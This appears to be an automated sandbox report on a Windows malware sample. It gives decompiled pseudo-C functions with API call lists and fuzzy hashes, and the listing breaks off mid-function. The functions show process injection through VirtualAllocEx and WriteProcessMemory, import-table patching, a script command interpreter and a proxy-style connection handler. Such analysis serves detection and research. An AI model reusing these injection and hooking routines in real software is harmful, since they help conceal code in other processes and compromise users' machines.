                						_t7 = _t7->i(0xffffffff,  &_v8);
                						if(_t7 != 0) {
                							goto L4;
                						} else {
                							return 0;
                						}
                					}
                				}
                			}

                0x0040f506
                0x0040f50f
                0x0040f517
                0x0040f539
                0x0040f541
                0x0040f519
                0x0040f51f
                0x0040f527
                0x00000000
                0x0040f529
                0x0040f52f
                0x0040f533
                0x00000000
                0x0040f535
                0x0040f538
                0x0040f538
                0x0040f533
                0x0040f527

                APIs
                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0040751C,00000000,00407832), ref: 0040F50F
                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040F51F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: IsWow64Process$kernel32.dll
                • API String ID: 1646373207-3024904723
                • Opcode ID: 77363ff6abec88cf8231562f5a850e471fc702b449621d8bd81e7f84cd361e17
                • Instruction ID: 99360361ddb860fd658623506d1cbc3caa78e3ffc6cc61a8505642ad20e7410c
                • Opcode Fuzzy Hash: 77363ff6abec88cf8231562f5a850e471fc702b449621d8bd81e7f84cd361e17
                • Instruction Fuzzy Hash: A3E0DF75200206BADF109FB5AD0AB5B32AC9B10798F204279A010F20C1EBFCCA08A12C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004131F5(intOrPtr _a4, intOrPtr _a12) {
                				void* __esi;
                				void* _t6;
                				signed int _t7;
                				intOrPtr _t9;
                
                				if(_a12 == 0x64 || _a12 == 0x33) {
                					EnterCriticalSection(0x41aa38);
                					_t7 = E00412CBF(_a4);
                					if(_t7 != 0xffffffff) {
                						_t9 =  *0x41aa50; // 0x0
                						_t7 = SetEvent( *(_t7 * 0x24 + _t9 + 4));
                					}
                					LeaveCriticalSection(0x41aa38);
                					return _t7;
                				}
                				return _t6;
                			}

                0x004131fa
                0x0041320b
                0x00413215
                0x0041321d
                0x0041321f
                0x0041322c
                0x0041322c
                0x00413233
                0x00000000
                0x0041323a
                0x0041323b

                APIs
                • EnterCriticalSection.KERNEL32(0041AA38), ref: 0041320B
                • SetEvent.KERNEL32(?), ref: 0041322C
                • LeaveCriticalSection.KERNEL32(0041AA38), ref: 00413233
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: CriticalSection$EnterEventLeave
                • String ID: 3
                • API String ID: 3094578987-1842515611
                • Opcode ID: b4d6131e6587327dfd035e35e077c4b7f78641d3eaa56876753da921a7245954
                • Instruction ID: d3b77365b12bde46e7ed69af9c86c377a3a102a80826cfd8a8d565be135cedf8
                • Opcode Fuzzy Hash: b4d6131e6587327dfd035e35e077c4b7f78641d3eaa56876753da921a7245954
                • Instruction Fuzzy Hash: 34E06D35004100AFC3116B15AA488AABB64EEEA372704C57FF026A2170C73888A2CA1A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 97%
                			E00404B67(signed int __eax, void* __ecx, void* __edx, signed int _a4, char _a8) {
                				void* _v8;
                				intOrPtr _v12;
                				void* _t39;
                				intOrPtr _t46;
                				intOrPtr* _t47;
                				intOrPtr _t48;
                				intOrPtr* _t50;
                				char _t52;
                				char* _t55;
                				signed int _t57;
                				void* _t62;
                				intOrPtr* _t65;
                				intOrPtr _t66;
                				intOrPtr* _t67;
                				void* _t68;
                				intOrPtr* _t69;
                				void* _t71;
                				intOrPtr _t73;
                				intOrPtr _t74;
                				intOrPtr _t78;
                				void* _t79;
                				intOrPtr* _t80;
                				intOrPtr* _t82;
                				intOrPtr* _t90;
                
                				_t68 = __edx;
                				_push(__ecx);
                				_push(__ecx);
                				_t57 = __eax;
                				_t62 = 0;
                				if(__eax <= 0) {
                					L4:
                					_t71 = VirtualAllocEx(0xffffffff, 0, _t57 * 0x23, 0x3000, 0x40);
                					if(_t71 == 0) {
                						L35:
                						_t39 = 0;
                						__eflags = 0;
                						L36:
                						L37:
                						return _t39;
                					}
                					if(_a8 != 0) {
                						ResetEvent( *0x419540);
                					}
                					_v8 = 0;
                					if(_t57 <= 0) {
                						L11:
                						if(_v8 != _t57) {
                							E00404ACF(_t57, _a4);
                							__eflags = _a8;
                							if(_a8 != 0) {
                								SetEvent( *0x419540);
                							}
                							goto L35;
                						}
                						if(_t57 <= 0) {
                							L30:
                							if(_a8 != 0) {
                								SetEvent( *0x419540);
                							}
                							_t39 = 1;
                							goto L36;
                						}
                						_t69 = _a4;
                						_a4 = _t57;
                						do {
                							_t16 = _t69 + 8; // 0xe8ec81f8
                							_v12 =  *_t16;
                							_v8 =  *_t69;
                							_t46 =  *0x4192e4; // 0x400000
                							_t19 = _t46 + 0x3c; // 0xe0
                							_t65 =  *_t19 + _t46 + 0x80;
                							_t78 =  *_t65;
                							_t73 = _t46;
                							if(_t78 <= 0 ||  *((intOrPtr*)(_t65 + 4)) <= 0x14) {
                								L25:
                								_t28 = _t69 + 8; // 0xe8ec81f8
                								_t74 =  *_t28;
                								_t66 =  *_t69;
                								_t79 = 0;
                								do {
                									_t29 = _t79 + 0x4192f0; // 0x4192f0
                									_t47 = _t29;
                									if( *_t47 == _t66) {
                										 *_t47 = _t74;
                									}
                									_t79 = _t79 + 4;
                								} while (_t79 < 0x1c);
                							} else {
                								_t67 = _t78 + _t46;
                								while(1) {
                									_t48 =  *_t67;
                									if(_t48 == 0) {
                										goto L25;
                									}
                									_t80 = _t48 + _t73;
                									_t50 =  *((intOrPtr*)(_t67 + 0x10)) + _t73;
                									while(1) {
                										__eflags =  *_t80;
                										if( *_t80 == 0) {
                											break;
                										}
                										__eflags = _v8 -  *_t50;
                										if(_v8 ==  *_t50) {
                											 *_t50 = _v12;
                										}
                										_t80 = _t80 + 4;
                										_t50 = _t50 + 4;
                										__eflags = _t50;
                									}
                									_t67 = _t67 + 0x14;
                									__eflags = _t67;
                								}
                								goto L25;
                							}
                							_t69 = _t69 + 0x10;
                							_t30 =  &_a4;
                							 *_t30 = _a4 - 1;
                						} while ( *_t30 != 0);
                						goto L30;
                					} else {
                						_t82 = _a4 + 8;
                						_t90 = _t82;
                						while(1) {
                							_t7 = _t82 - 4; // 0x91a00d83
                							_t8 = _t82 - 8; // 0x774c084
                							_t52 = E0040F207( *_t7, _t62, _t68, _t90,  *_t8, _t71);
                							if(_t52 == 0) {
                								goto L11;
                							}
                							 *_t82 = _t71;
                							_t71 = _t71 + _t52;
                							_v8 = _v8 + 1;
                							 *((char*)(_t82 + 4)) = _t52;
                							_t82 = _t82 + 0x10;
                							if(_v8 < _t57) {
                								continue;
                							}
                							goto L11;
                						}
                						goto L11;
                					}
                				}
                				_t55 = _a4 + 0xc;
                				while( *((intOrPtr*)(_t55 - 0xc)) != 0) {
                					 *((intOrPtr*)(_t55 - 4)) = 0;
                					 *_t55 = 0;
                					_t62 = _t62 + 1;
                					_t55 = _t55 + 0x10;
                					if(_t62 < _t57) {
                						continue;
                					}
                					goto L4;
                				}
                				_t39 = 0;
                				goto L37;
                			}

                0x00404b67
                0x00404b6a
                0x00404b6b
                0x00404b6e
                0x00404b72
                0x00404b76
                0x00404b95
                0x00404bac
                0x00404bb0
                0x00404cc5
                0x00404cc5
                0x00404cc5
                0x00404cc7
                0x00404cc8
                0x00404ccb
                0x00404ccb
                0x00404bba
                0x00404bc2
                0x00404bc2
                0x00404bc8
                0x00404bcd
                0x00404bf7
                0x00404bfa
                0x00404cae
                0x00404cb3
                0x00404cb7
                0x00404cbf
                0x00404cbf
                0x00000000
                0x00404cb7
                0x00404c02
                0x00404c93
                0x00404c97
                0x00404c9f
                0x00404c9f
                0x00404ca5
                0x00000000
                0x00404ca5
                0x00404c08
                0x00404c0b
                0x00404c0e
                0x00404c0e
                0x00404c11
                0x00404c16
                0x00404c19
                0x00404c1e
                0x00404c21
                0x00404c28
                0x00404c2a
                0x00404c2e
                0x00404c6c
                0x00404c6c
                0x00404c6c
                0x00404c6f
                0x00404c71
                0x00404c73
                0x00404c73
                0x00404c73
                0x00404c7b
                0x00404c7d
                0x00404c7d
                0x00404c7f
                0x00404c82
                0x00404c36
                0x00404c36
                0x00404c66
                0x00404c66
                0x00404c6a
                0x00000000
                0x00000000
                0x00404c42
                0x00404c48
                0x00404c5e
                0x00404c5e
                0x00404c61
                0x00000000
                0x00000000
                0x00404c4f
                0x00404c51
                0x00404c56
                0x00404c56
                0x00404c58
                0x00404c5b
                0x00404c5b
                0x00404c5b
                0x00404c63
                0x00404c63
                0x00404c63
                0x00000000
                0x00404c66
                0x00404c87
                0x00404c8a
                0x00404c8a
                0x00404c8a
                0x00000000
                0x00404bcf
                0x00404bd2
                0x00404bd2
                0x00404bd5
                0x00404bd5
                0x00404bd9
                0x00404bdc
                0x00404be3
                0x00000000
                0x00000000
                0x00404be5
                0x00404be7
                0x00404be9
                0x00404bec
                0x00404bef
                0x00404bf5
                0x00000000
                0x00000000
                0x00000000
                0x00404bf5
                0x00000000
                0x00404bd5
                0x00404bcd
                0x00404b7b
                0x00404b7e
                0x00404b87
                0x00404b8a
                0x00404b8d
                0x00404b8e
                0x00404b93
                0x00000000
                0x00000000
                0x00000000
                0x00404b93
                0x00404c3b
                0x00000000

                APIs
                • VirtualAllocEx.KERNEL32(000000FF,00000000,00000012,00003000,00000040,?,?,00000000,?,?,?,00404DB0,00419020,00000001,00407798,00000000), ref: 00404BA6
                • ResetEvent.KERNEL32(?,?,00000000,?,?,?,00404DB0,00419020), ref: 00404BC2
                • SetEvent.KERNEL32(?,?,00000000,?,?,?,00404DB0,00419020), ref: 00404C9F
                • SetEvent.KERNEL32(?,?,00000000,?,?,?,00404DB0,00419020), ref: 00404CBF
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Event$AllocResetVirtual
                • String ID:
                • API String ID: 4029583732-0
                • Opcode ID: a4595da3874a6bce4398495a5327fc9cb31f2deb7104b33838fa6823e895c3df
                • Instruction ID: 600be0b69083ccd930527d114a24bba1cc43f5838100a8772a9e597ba6594c99
                • Opcode Fuzzy Hash: a4595da3874a6bce4398495a5327fc9cb31f2deb7104b33838fa6823e895c3df
                • Instruction Fuzzy Hash: 3741D6B1905210EFEB21DF14C884A9E7BB5FB85314F1680BAEA55BB391D338ED41CB58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00415520(void* __ebx, void* __edx, void* __esi, intOrPtr* _a4) {
                				signed int _v8;
                				intOrPtr _v12;
                				signed int _v16;
                				intOrPtr _v20;
                				char _v24;
                				WCHAR** _v28;
                				void* __edi;
                				intOrPtr _t35;
                				intOrPtr* _t40;
                				void* _t54;
                				WCHAR** _t69;
                				signed int _t73;
                
                				_v8 = _v8 & 0x00000000;
                				_t35 = E0040A0EC(E0040A3AA(__edx),  &_v24, __edx);
                				_v20 = _t35;
                				if(_t35 != 0xffffffff) {
                					if(_t35 <= 0) {
                						L21:
                						E00409813(_v20, _v24);
                						goto L22;
                					}
                					_v16 = _v16 & 0x00000000;
                					_v12 = 1;
                					do {
                						_t40 = _v24 + _v16;
                						if( *_t40 == 0) {
                							goto L17;
                						}
                						_t71 =  *_t40;
                						if( *((short*)( *_t40)) == 0) {
                							goto L17;
                						}
                						_t54 = E0040A1B5(_t71, E0040A3AA(_t71),  &_v28);
                						if(_t54 == 0xffffffff) {
                							_v8 = "Not enough memory.";
                							L20:
                							goto L21;
                						}
                						_t69 = _v28;
                						if(_t54 <= 0) {
                							L16:
                							E00409813(_t54, _t69);
                							if(_v8 != 0) {
                								goto L20;
                							}
                							goto L17;
                						}
                						_t73 = 0;
                						while(lstrcmpiW( *_t69,  *(0x401ed0 + _t73 * 8)) != 0) {
                							_t73 = _t73 + 1;
                							if(_t73 < 0x18) {
                								continue;
                							}
                							L14:
                							if(_t73 == 0x18) {
                								_v8 = "Unknown command at line %u.";
                								 *_a4 = _v12;
                							}
                							goto L16;
                						}
                						if( *((intOrPtr*)(0x401ed4 + _t73 * 8))() == 0) {
                							_v8 = "Failed to execute command at line %u.";
                							 *_a4 = _v12;
                						}
                						goto L14;
                						L17:
                						_v16 = _v16 + 4;
                						_v12 = _v12 + 1;
                					} while (_v12 - 1 < _v20);
                					goto L20;
                				} else {
                					_v8 = "Not enough memory.";
                					L22:
                					return _v8;
                				}
                			}

                0x00415526
                0x00415534
                0x00415539
                0x0041553f
                0x00415550
                0x00415618
                0x0041561e
                0x00000000
                0x00415623
                0x00415556
                0x0041555b
                0x00415563
                0x00415569
                0x0041556e
                0x00000000
                0x00000000
                0x00415574
                0x0041557a
                0x00000000
                0x00000000
                0x0041558f
                0x00415594
                0x0041560f
                0x00415616
                0x00000000
                0x00415617
                0x00415596
                0x0041559b
                0x004155ec
                0x004155ee
                0x004155f7
                0x00000000
                0x00000000
                0x00000000
                0x004155f7
                0x0041559d
                0x0041559f
                0x004155b2
                0x004155b6
                0x00000000
                0x00000000
                0x004155d8
                0x004155db
                0x004155e3
                0x004155ea
                0x004155ea
                0x00000000
                0x004155db
                0x004155c7
                0x004155cf
                0x004155d6
                0x004155d6
                0x00000000
                0x004155f9
                0x004155f9
                0x004155fd
                0x00415604
                0x00000000
                0x00415541
                0x00415541
                0x00415624
                0x00415628
                0x00415628

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: lstrcmpi
                • String ID: Failed to execute command at line %u.$Not enough memory.$Unknown command at line %u.
                • API String ID: 1586166983-1498851671
                • Opcode ID: 30f14bd8a7a45581c2282d81f981393bcf47fba194e16d143c6612c58e65ee8e
                • Instruction ID: 9dc12722c77ddc691a7368cb8fdd39440c415d4a00dddf1b818b76ae52e57327
                • Opcode Fuzzy Hash: 30f14bd8a7a45581c2282d81f981393bcf47fba194e16d143c6612c58e65ee8e
                • Instruction Fuzzy Hash: 14319535A00618EBCF10EFA9C4846EEB7B6BF95314F50406AE411B7390D7789E81CB89
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E00407A4C(void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4, void _a8) {
                				char _v5;
                				void _v12;
                				void* _t23;
                				void _t24;
                				void _t39;
                				void* _t49;
                				void* _t50;
                
                				_t50 = __esi;
                				_t49 = __edi;
                				_t23 =  *0x4192e4; // 0x400000
                				_t24 = E0040F02D(_t23, __edi);
                				_v12 = _t24;
                				if(_t24 != 0) {
                					_v5 = 0;
                					if(DuplicateHandle(0xffffffff, _a4, __edi,  &_a4, 0, 0, 2) == 0) {
                						_v5 = 1;
                					}
                					_push(_t50);
                					if(WriteProcessMemory(_t49, 0x4192d0 -  *0x4192e4 + _v12,  &_a8, 4, 0) == 0) {
                						_v5 = _v5 + 1;
                					}
                					if(WriteProcessMemory(_t49, 0x4192e4 -  *0x4192e4 + _v12,  &_v12, 4, 0) == 0) {
                						_v5 = _v5 + 1;
                					}
                					if(E00407378(0x419798, _t49, _v12,  *0x419798) == 0) {
                						_v5 = _v5 + 1;
                					}
                					if(E00407378(0x41979c, _t49, _v12,  *0x41979c) == 0) {
                						_v5 = _v5 + 1;
                					}
                					if(_v5 == 0) {
                						_t39 = _v12;
                					} else {
                						VirtualFreeEx(_t49, _v12, 0, 0x8000);
                						goto L1;
                					}
                				} else {
                					L1:
                					_t39 = 0;
                				}
                				return _t39;
                			}

                0x00407a4c
                0x00407a4c
                0x00407a51
                0x00407a58
                0x00407a5f
                0x00407a64
                0x00407a79
                0x00407a86
                0x00407a88
                0x00407a88
                0x00407a8c
                0x00407ab0
                0x00407ab2
                0x00407ab2
                0x00407ad3
                0x00407ad5
                0x00407ad5
                0x00407aee
                0x00407af0
                0x00407af0
                0x00407b09
                0x00407b0b
                0x00407b0b
                0x00407b11
                0x00407b28
                0x00407b13
                0x00407b1d
                0x00000000
                0x00407b1d
                0x00407a66
                0x00407a66
                0x00407a66
                0x00407a66
                0x00407b2d

                APIs
                  • Part of subcall function 0040F02D: IsBadReadPtr.KERNEL32(00400000,?,00000000,?,00000000,?,00000000,?,?,00000000), ref: 0040F049
                • DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002,00000000,00000000,?,?,?,00413B94,?,00000000,?), ref: 00407A7E
                • WriteProcessMemory.KERNEL32(00000000,-00000014,?,00000004,00000000,?,?,?,?,00413B94,?,00000000,?,?,00413D20,?), ref: 00407AAC
                • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000004,00000000,?,?,?,00413B94,?,00000000,?,?,00413D20,?,?), ref: 00407ACE
                • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,00413B94,?,00000000,?,?,00413D20), ref: 00407B1D
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: MemoryProcessWrite$DuplicateFreeHandleReadVirtual
                • String ID:
                • API String ID: 2215616122-0
                • Opcode ID: 46dff849d72da35fab14edd5a96a290206f66e048153ea148a947f6979de9e9d
                • Instruction ID: 023d5390f456304c9f8919226834dc34827cf2621a248f917b1bf10a616807a2
                • Opcode Fuzzy Hash: 46dff849d72da35fab14edd5a96a290206f66e048153ea148a947f6979de9e9d
                • Instruction Fuzzy Hash: 7F21A671A08105BADF019BA49CD0EFE7F78DB09758F0440AAFA01B2291D3396E45DB29
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0041096F(signed int __edx, void** __esi, void* _a4, signed int _a8) {
                				char _v5;
                				long _v12;
                				void _v20;
                				signed int _v24;
                				signed int _v28;
                				signed int _v32;
                				signed int _v36;
                				signed int _t26;
                				signed int _t29;
                				signed int _t46;
                				void** _t48;
                
                				_t48 = __esi;
                				_t46 = __edx;
                				_v5 = 0;
                				if(_a8 <= 0xa00000) {
                					_t26 = E0040B135( *__esi);
                					_v36 = _t26;
                					_v32 = _t46;
                					if((_t26 & _t46) != 0xffffffff && E0040B115( *__esi, 0, 0, 2) != 0) {
                						_t29 = E0040B135( *__esi);
                						_v28 = _t29;
                						_v24 = _t46;
                						if((_t29 & _t46) != 0xffffffff) {
                							E004098AA( &_v20,  &_v20, 0, 5);
                							_v20 = __esi[4] ^ _a8;
                							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, _a8,  &_v12, 0) == 0 || _v12 != _a8) {
                								E0040B115( *_t48, _v28, _v24, 0);
                								SetEndOfFile( *_t48);
                							} else {
                								_v5 = 1;
                							}
                						}
                						FlushFileBuffers( *_t48);
                						E0040B115( *_t48, _v36, _v32, 0);
                					}
                				}
                				return _v5;
                			}

                0x0041096f
                0x0041096f
                0x00410980
                0x00410983
                0x0041098b
                0x00410990
                0x00410995
                0x0041099b
                0x004109b6
                0x004109bb
                0x004109c0
                0x004109c6
                0x004109cf
                0x004109e1
                0x004109f4
                0x00410a26
                0x00410a2d
                0x00410a17
                0x00410a17
                0x00410a17
                0x004109f4
                0x00410a35
                0x00410a44
                0x00410a44
                0x0041099b
                0x00410a4f

                APIs
                  • Part of subcall function 0040B135: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,?,00000000,00000000), ref: 0040B14A
                  • Part of subcall function 0040B115: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00410948,?,00000000,00000000,00000000,00000000), ref: 0040B127
                • WriteFile.KERNEL32(?,?,00000005,00000000,00000000,?,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 004109F0
                • WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 00410A09
                • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00410A2D
                • FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 00410A35
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: File$PointerWrite$BuffersFlush
                • String ID:
                • API String ID: 1289656144-0
                • Opcode ID: 136f62893871a8e3d77aff1e132577e63286b1fbbdba6dfae9b789199231357b
                • Instruction ID: deb2f6dbc83f18a79abbd262d1022ff78ecffaeb00a11f6f7a81fe5824f466e8
                • Opcode Fuzzy Hash: 136f62893871a8e3d77aff1e132577e63286b1fbbdba6dfae9b789199231357b
                • Instruction Fuzzy Hash: 04318F76800208EFDF11AFA4CC41EEEBBB9EF54384F14842AF190B61A1D37A8995DF54
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040DCC2(HANDLE* _a4) {
                				struct tagMSG _v28;
                				long _t5;
                
                				while(1) {
                					_t5 = MsgWaitForMultipleObjects(1, _a4, 0, 0xffffffff, 0x4bf);
                					if(_t5 != 1) {
                						break;
                					}
                					while(PeekMessageW( &_v28, 0, 0, 0, 1) != 0) {
                						TranslateMessage( &_v28);
                						DispatchMessageW( &_v28);
                					}
                				}
                				return _t5;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: MessageMultipleObjectsPeekWait
                • String ID:
                • API String ID: 3986374578-0
                • Opcode ID: c77ae905896d21d15b02800187d67b9768f7e1ee52069b6fec49a9d4a5287571
                • Instruction ID: 43c0066ee1c312274e20e06fb934691d564a2ac68e407947be14e7ff5a3b814f
                • Opcode Fuzzy Hash: c77ae905896d21d15b02800187d67b9768f7e1ee52069b6fec49a9d4a5287571
                • Instruction Fuzzy Hash: 6FF0BE7290420D7FE700AFE5DD88DA77BACFB893A4B05097EBA11E2060D639D8099775
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004157C7(void* __eflags) {
                				void* _t1;
                				long _t6;
                				void* _t12;
                
                				_t1 = E00407A11(_t12, 0x19367400, 1);
                				_t19 = _t1;
                				if(_t1 != 0) {
                					if(E00407B3F() == 0) {
                						L7:
                						E0040DD1D(_t19);
                						return 0;
                					}
                					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
                					_t6 = WaitForSingleObject( *0x419798, 0x1388);
                					while(_t6 == 0x102) {
                						E00413BF3();
                						_t6 = WaitForSingleObject( *0x419798, 0x1388);
                					}
                					goto L7;
                				}
                				return _t1 + 1;
                			}

                APIs
                  • Part of subcall function 00407A11: CreateMutexW.KERNEL32(0041930C,00000000,?,?,?,?,?), ref: 00407A32
                • GetCurrentThread.KERNEL32 ref: 004157EB
                • SetThreadPriority.KERNEL32(00000000,?,?,?,19367400,00000001), ref: 004157F2
                • WaitForSingleObject.KERNEL32(00001388,?,?,?,19367400,00000001), ref: 0041580A
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Thread$CreateCurrentMutexObjectPrioritySingleWait
                • String ID:
                • API String ID: 3441234504-0
                • Opcode ID: 3c4bc1fcba093463ca7ec7a7ff2f1f42970421972e355cbde7b6ede548dc43cc
                • Instruction ID: 7053b9dcba28187c44e90bcd02408608f403a4c97a74a96f377c2366faff531a
                • Opcode Fuzzy Hash: 3c4bc1fcba093463ca7ec7a7ff2f1f42970421972e355cbde7b6ede548dc43cc
                • Instruction Fuzzy Hash: 29F05931914208EED6003BA1AC44DEB3A0EDB943A8B200037F511A21A2D9384CD286BA
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 79%
                			E0040D89E(void* __eflags, signed int _a4) {
                				char _v9;
                				char _v13;
                				char _v20;
                				signed int _v24;
                				signed int _v29;
                				short _v31;
                				signed char _v32;
                				intOrPtr _v36;
                				signed int _v48;
                				short _v50;
                				char _v52;
                				char _v312;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* _t59;
                				void* _t61;
                				short _t77;
                				void* _t79;
                				void* _t84;
                				char _t102;
                				char* _t104;
                				signed int _t114;
                				void* _t124;
                				intOrPtr _t126;
                				void* _t127;
                				char _t129;
                				void* _t131;
                				intOrPtr _t132;
                				void* _t133;
                
                				_t109 = _a4;
                				_t59 = E0040CDF1(_t109);
                				_push(0);
                				_push( &_v32);
                				_t61 = 7;
                				_v24 = 0 | _t59 == 0x00000017;
                				if(E0040C7D0(_t61, _t109) != 0) {
                					while(E0040C7D0(1, _t109,  &_v9, 0) != 0) {
                						if(_v9 == 0) {
                							_t114 = _v29;
                							_t115 = _t114 << 0x10;
                							_v13 = 0x5a;
                							if(((_t114 & 0x00ff0000 | _t114 >> 0x00000010) >> 0x00000008 | (_t114 & 0x0000ff00 | _t114 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
                								L20:
                								_v9 = 1;
                								if(_v13 != 0x5a) {
                									L44:
                									return E0040D828(_t109, 0xffffffff, _v13, _v24) & 0xffffff00 | _t73 != 0x00000000;
                								}
                								E004098AA( &_v52,  &_v52, 0, 0x10);
                								_t77 = 2;
                								_v52 = _t77;
                								_t79 = (_v32 & 0x000000ff) - 1;
                								if(_t79 == 0) {
                									_v50 = _v31;
                									_v48 = _v29;
                									_t127 = E0040C867( &_v52);
                									if(_t127 == 0xffffffff) {
                										L23:
                										_v13 = 0x5b;
                										goto L44;
                									}
                									E0040CC2C(_t115, _t127);
                									_t84 = E0040D828(_t109, _t127, 0x5a, _v24);
                									if(_t84 != 1) {
                										if(_t84 != 0xffffffff) {
                											_v9 = 0;
                										} else {
                											_v13 = 0x5b;
                										}
                									} else {
                										_push(_t127);
                										_t84 = E0040CA62(_t109);
                									}
                									E0040CBD4(_t84, _t127);
                									if(_v9 != 1 || _v13 == 0x5a) {
                										L34:
                										return _v9;
                									} else {
                										goto L44;
                									}
                								}
                								if(_t79 == 1) {
                									_t129 = E0040C961( &_v52, 1);
                									_v20 = _t129;
                									if(_t129 == 0xffffffff) {
                										goto L23;
                									}
                									_t124 = E0040D828(_t109, _t129, 0x5a, _v24);
                									if(_t124 != 1) {
                										L31:
                										E0040CBD4(_t89, _t129);
                										if(_t124 == 0xffffffff) {
                											goto L23;
                										}
                										if(_t124 != 1) {
                											_v9 = 0;
                										}
                										goto L34;
                									}
                									_t126 = E0040CBA9( &_a4);
                									_v36 = _t126;
                									E0040CBD4(_t92, _v20);
                									if(_t126 != 0xffffffff) {
                										E0040CC2C(_t115, _t126);
                										_t109 = _a4;
                										_t124 = E0040D828(_a4, _t126, 0x5a, _v24 | 0x00000002);
                										if(_t124 == 1) {
                											_push(_v36);
                											_t89 = E0040CA62(_t109);
                										}
                										_t129 = _v36;
                										goto L31;
                									}
                									_t109 = _a4;
                									_v13 = 0x5b;
                									goto L44;
                								}
                								goto L23;
                							}
                							_t131 = 0;
                							while(1) {
                								_t115 = _t109;
                								if(E0040C7D0(1, _t109,  &_v9, 0) == 0) {
                									goto L1;
                								}
